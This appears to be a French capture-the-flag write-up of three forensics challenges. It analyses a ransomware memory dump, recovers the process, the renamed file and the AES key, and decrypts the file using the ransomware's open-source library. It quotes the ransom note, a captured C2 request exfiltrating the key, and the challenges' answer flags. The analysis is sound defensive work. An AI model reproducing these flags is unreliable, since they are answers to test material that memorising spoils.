# 3615 Incident 1/3

**Description**

Une victime de plus tombée sous le coup d’un rançongiciel. Le paiement de la rançon n’est pas envisagée vu le montant demandé. Vous êtes appelé pour essayer de restaurer les fichiers chiffrés.

Pour commencer, quel est le nom du fichier exécutable de ce rançongiciel, son identifiant de processus et quel est devenu le nom du fichier flag.docx une fois chiffré ? Donnez le SHA1 de ce nom avec son extension.

Note : Réponse attendue au format ECSC{nom_du_rançongiciel.exe:pid:sha1}.

Fichier: [mem.dmp.tar.xz](https://hackropole.fr/filer/fcsc2019-forensics-3615-incident/public_filer/mem.dmp.tar.xz)

**Solution**

On lance [MemProcFs](https://github.com/ufrisk/MemProcFS) sur le dump fourni. On regarde les process
qui tourne, et il y en a qui est louche, car lancé depuis le dossier `Downloads` de l'utilisateur :
```
---- assistance.exe           5208   3184 32  U* TNKLSAI3TGT7O9   \Device\HarddiskVolume3\Users\TNKLSAI3TGT7O9\Downloads\assistance.exe
                                                                  C:\Users\TNKLSAI3TGT7O9\Downloads\assistance.exe
                                                                  "C:\Users\TNKLSAI3TGT7O9\Downloads\assistance.exe" 
                                                                  2019-05-08 20:00:16 UTC ->                     ***
                                                                  High
```

En faisant un `strings` sur sa mémoire (`pid/5208/minidump/minidump.dmp`), on a la confirmation du suspect :
```
        <pre>
        VOS FICHIERS ONT ETE CHIFFRES EN AES-256-CTR
        VOTRE IDENTIFIANT EST
        ENVOYER %s PAR TELEPATHIE A
        PUIS PRENDRE CONTACT AU %s
        POUR FAIRE PART DE VOTRE TRISTESSE
        LE YOGA PEUT AIDER EN CAS DE CRISE :)
        </pre>
```

Dans le même dump mémoire du process, on cherche l'apparition de `flag.docx` :
```
Renaming C:\Users\TNKLSAI3TGT7O9\Documents\flag.docx to C:\Users\TNKLSAI3TGT7O9\Documents\ZmxhZy5kb2N4
```

Le flag est donc `ECSC{assistance.exe:5208:e369721556c3adea35f5689639993dd9c3929145}`.

Mais ça valide pas. On recherche des occurrences de `ZmxhZy5kb2N4` dans la timeline NTFS (`forensic/timeline/timeline_ntfs.txt`):

```
2019-05-08 20:00:29 UTC  NTFS   MOD         0         0         1795f800 \.\ZmxhZy5kb2N4.chiffré
2019-05-08 20:00:29 UTC  NTFS   MOD         0         0         2b2d1400 \ORPHAN\$22\ZmxhZy5kb2N4.chiffré
```

Le flag est donc `ECSC{assistance.exe:5208:c9a12b109a58361ff1381fceccdcdcade3ec595a}`.


# 3615 Incident 2/3

**Description**

Une victime de plus tombée sous le coup d’un rançongiciel. Le paiement de la rançon n’est pas envisagée vu le montant demandé. Vous êtes appelé pour essayer de restaurer les fichiers chiffrés.

Retrouvez la clé de chiffrement de ce rançongiciel !

**Note** : Réponse attendue au format `ECSC{hey.hex()}`.

**Solution**

On sort l'exécutable `pid/5208/files/modules/assistance.exe` et on l'ouvre dans Ghidra. Problème, c'est du Go static et stripped,
on a donc toutes les fonctions embarquées, sans les symboles. Il va être compliqué de faire un sens de tout ça. Tout de même,
on suit les tutos qui nous indiquent d'aller chercher la chaîne `main.main` dans l'exécutable. Et là, surprise !
 
```
        008268ac 00 f4 6b 00     addr       DAT_006bf400                                     = 03h
        008268b0 6d 61 69        ds         "main.main"
                 6e 2e 6d 
                 61 69 6e 00
        008268ba 00              ??         00h
        008268bb 67 69 74        ds         "github.com/mauri870/ransomware/client.New"
                 68 75 62 
                 2e 63 6f 
        008268e5 00              ??         00h
```

Il se trouve que le repo [github en question](https://github.com/mauri870/ransomware) est toujours accessible ! Ça va nous aider. ;-) 
En lisant le code, on comprend plusieurs choses :
- [pour le chiffrement](https://github.com/mauri870/ransomware/blob/master/cmd/ransomware/ransomware.go#L113), le ransomware crée un couple de chaînes hexadécimales aléatoires de 32 caractères qui vont servir d'identifiant
et de clef de chiffrement.
- l'identifiant et la clef de chiffrement sont [envoyés au C2](https://github.com/mauri870/ransomware/blob/master/client/client.go#L90) dans une payload chiffrée RSA par [une clef publique](https://github.com/mauri870/ransomware/blob/master/cmd/ransomware/ransomware.go#L60).

On retrouve ces éléments dans le dump de l'exécutable et celui de sa mémoire. Par exemple, la clef publique peut être trouvé dans
le dump à coup de `strings` ou grâce à `binwalk` (la clef est inclue dans le binaire sous forme compressée grâce à [go-bindata](https://github.com/go-bindata/go-bindata)) :

```
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAzUmqLfXxAa/LZO2KqwRQ
LZuV9Cf443+MR3xtmBw3gcC8M0bR73Jn/w5G/ZPltZnJ3Qabh9EDb939PPDoca4Q
/+Kov2OAWKLTv5om1b9wpFHyvCpLrQrbEH8lC/ReLo6oSY2Zco5c6crSvVXeiFVS
2V+9Jtf/UdlSJjEpbm9CbCNLc4dqR0FakVep1tZVrBDVGPeWyii9hChq7hEumoOs
+mKf49AU+A1LuKaCJiXDwoA4ILY6wrXzsqGfJHiMUa5zuN9MUSsupHHyz507OrcR
WyBwOMNVwFub3TOqy4nMocXShHpG8l2msS2TEMej7QvOmLGTXyAWeS6nAOgTDWtp
8MqXZab51+u8GnTqE7O44TZZBmyQbSTWqF6iAS4bwR85RiYxHkg04brgfBgGBJ6B
5w21YbUdg7L1N7RP9ZPx9xvVeUW1Vntidw8/VCAq+oFu1lI+6l4nYHFZfyKwccf9
g478qjca/5+OPYWUIh8BB2BfCtJUphcRWPGFNX4YxYNkmahw5Nyab4ZpVJOafwjQ
PIW8KGVQApuE03aV+d8UmLSoyNbE+VYHzGOCNM9BeHV14hCgJDBSkPrs/LVVu6T1
QPwieNnmcyD48kC2hmkn0qvCTkmEZdgndDJkJmBZ9pv4cOCzsOGp/bd00F+Or5L0
IywqxW+zIcHx9KYUAIXEfxkCAwEAAQ==
-----END PUBLIC KEY-----
```

Malheureusement, [RsaCtfTools](https://github.com/RsaCtfTool/RsaCtfTool) ne parvient pas à la casser. C'est dommage 
car on trouve l'échange avec le C2 dans le dump mémoire, si on avait la clef on aurait pû la décoder 
et obtenir la clef de chiffrement :

```
POST /api/keys/add HTTP/1.1
Host: 192.168.1.25:8080
User-Agent: Go-http-client/1.1
Content-Length: 1270
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
payload=%8D%9C%E1r%FD%D7%9F%05%2A%9F%D6%E9A%3B%22%DC%F9%0D%ED%12%B3%04-I%A9yb4hYT%3D.%C6%A4Y%E7K%BF%E66%E1%856%C9%7B%5B%87%E2%B7%84%D4%A16%CB%12N%ED%F2%F8L%DA%122k
%D0%BB%AF%AC%00%CB%15%99%EE%C5%E3%5DU%26%11%B3%FD%F26+%2A%C1q%E3%9Cq%9A%01%DA%F7%9D%D1%F3%89c%FFMfg%B1%F2%D3n%926%0FG2%7Dl%E9h%F4%E8%09%D4%C0%85lAf%A5E%0EaG.7%BF%3
Cu11%AC%3Ew%7D%87%B9DG%19%7D%C0%99~u%12%FFF%FD%A6O%00%A1h%E4%85%9DV%7D%E6.%AA%3A%40%8F%CD2%99%D7%07%A7%B9%81n%D2kx%8E%15%9D%1B%9Eln%2CN%81%26t%BD%1E%83x%2FP%96%85%
21%F6+%19x%3FK%92%F9%A8%EF%D0%AC%BA%8Fi%85%CC0%CBCi%BER%3Ew%04%C7%D3%BC%D5%EE%82%5D%E0~%B7%25%7F%C6%A9%D5%91J%60%3BI%D2%09%A6%A3%3A%82%E8%D48%93%A8n%FB%5CB%0E%16%1
CGX%B1%2B%3F%0E1%B0%9Fj%B8%93%03%DC%1CX%AE%FB%A9e%B4%AD%0A%A2%B3%93%D1%BC%CA%11%C0%3BVq%C3%8E0%B3%8D%F6%FF%D5%CAT%DAB4%7B%9C%A4%CF%5B%93.%89%98Y%8C%5E%8B%CF%0E%B3%
0Dn%E4%B1%D7%A0%B7%81%BE%9A%FB.%E9U%3E%0F%1A%F2%E3%03%CC%B4H%2A%BE%9E%A2%82%94%A3%94%92%975%D5%F2j%B6%96_%B1%F2%D5%8E%CC%16wJ%08%E0%FC%F0%7F%AC%E6%3E%F8%60%97%D1%D
3%AE%BE%E8%D0q%FF6tU%99x%9D%8E1XL%FE%BB%A8%EA%E8h%05%F4%E4%A1%9F%FDfHg%04%B0%CFx+%8FM%9B%1E%DFO%D0%A4%FF%02%19%96%7F%90%24%26%EE.Q3%82%D6%0CW%D8%12%FD%D0%BF%82%FC%
92%FBv%94%AB%E5%A5%F1%A6%AFk%A8%DBEM%E3%C0%7D%B3%1A%1Cv%CAa%B5%C3%3E%1F%21s%B8%BF%94%DAP%60%3B%11%03nGS%F3t%C7%0A%A9%C1%8Ai%CA%9C
```

Dans ce même dump, on trouve un fragment de la payload avant qu'elle soit chiffrée, suivie d'une grande chaîne hexa :

```
{"id": "cd18c00bb476764220d05121867d62de", "enckey": "
cd18c00bb476764220d05121867d62de64e0821c53c7d161099be2188b6cac24cd18c00bb476764220d05121867d62de64e0821c53c7d161099be2188b6cac2495511870061fb3a2899aa6b2dc9838aa422d81e7e1c2aa46aa51405c13fed15b95511870061fb3a2899aa6b2dc9838aa422d81e7e1c2aa46aa51405c13fed15b
```
Chose intéressante, l'identifiant du ransomware est retrouvé dans la chaîne hexa. Si on découpe 
cette chaîne par bloc de 32 caractères, on obtient :
- cd18c00bb476764220d05121867d62de
- 64e0821c53c7d161099be2188b6cac24
- cd18c00bb476764220d05121867d62de
- 64e0821c53c7d161099be2188b6cac24
- 95511870061fb3a2899aa6b2dc9838aa
- 422d81e7e1c2aa46aa51405c13fed15b
- 95511870061fb3a2899aa6b2dc9838aa
- 422d81e7e1c2aa46aa51405c13fed15b

La génération de l'id et de la clef étant l'un derrière l'autre dans le code, peut-on supposer qu'ils sont stockés dans des zones mémoires contigües ?
On va tester les autres blocs de 32 octets.  `64e0821c53c7d161099be2188b6cac24` ne valide pas le challenge, mais le bloc suivant `95511870061fb3a2899aa6b2dc9838aa` oui. 

Le flag est donc : `ECSC{95511870061fb3a2899aa6b2dc9838aa}`


# 3615 Incident 3/3

**Description**

Une victime de plus tombée sous le coup d’un rançongiciel. Le paiement de la rançon n’est pas envisagée vu le montant demandé. Vous êtes appelé pour essayer de restaurer les fichiers chiffrés.

Déchiffrez le fichier [data](data) ci-joint !

**Solution**

La bonne nouvelle, c'est le repo github du ransomware fournit aussi [l'outil de déchiffrement](https://github.com/mauri870/ransomware/blob/master/cmd/unlocker/unlocker.go).
En s'inspirant de son code et de [la librairie cryptofs](https://github.com/mauri870/ransomware/blob/master/cryptofs/file.go) qu'il utilise, il est trivial
d'écrire un bout de code qui déchiffre le fichier, en utilisant directement la librairie en question :

```go
package main

import (
	"os"

	"github.com/mauri870/ransomware/cmd"
	"github.com/mauri870/ransomware/cryptofs"
)

func main() {
	// Ouvre le fichier chiffré
	fileInfo, err := os.Lstat("data")
	if err != nil {
		cmd.Logger.Println("LStat error:", err)
		os.Exit(1)
	}
	file := &cryptofs.File{FileInfo: fileInfo, Extension: "", Path: "./data"}

	// Crée le fichier déchiffré
	outFile, err := os.OpenFile("result.docx", os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
	if err != nil {
		cmd.Logger.Println("OpenFile error:", err)
		os.Exit(1)
	}

	// Déchiffre le fichier
	err = file.Decrypt("95511870061fb3a2899aa6b2dc9838aa", outFile)
	if err != nil {
		cmd.Logger.Println("Decrypt error:", err)
		os.Exit(1)
	}
}
```

On lance le script, et on obtient [un fichier Word](result.docx), qui contient le texte :
```
Flag : ECSC{M4ud1t3_C4mp4gn3_2_r4NC0nG1c13L}
```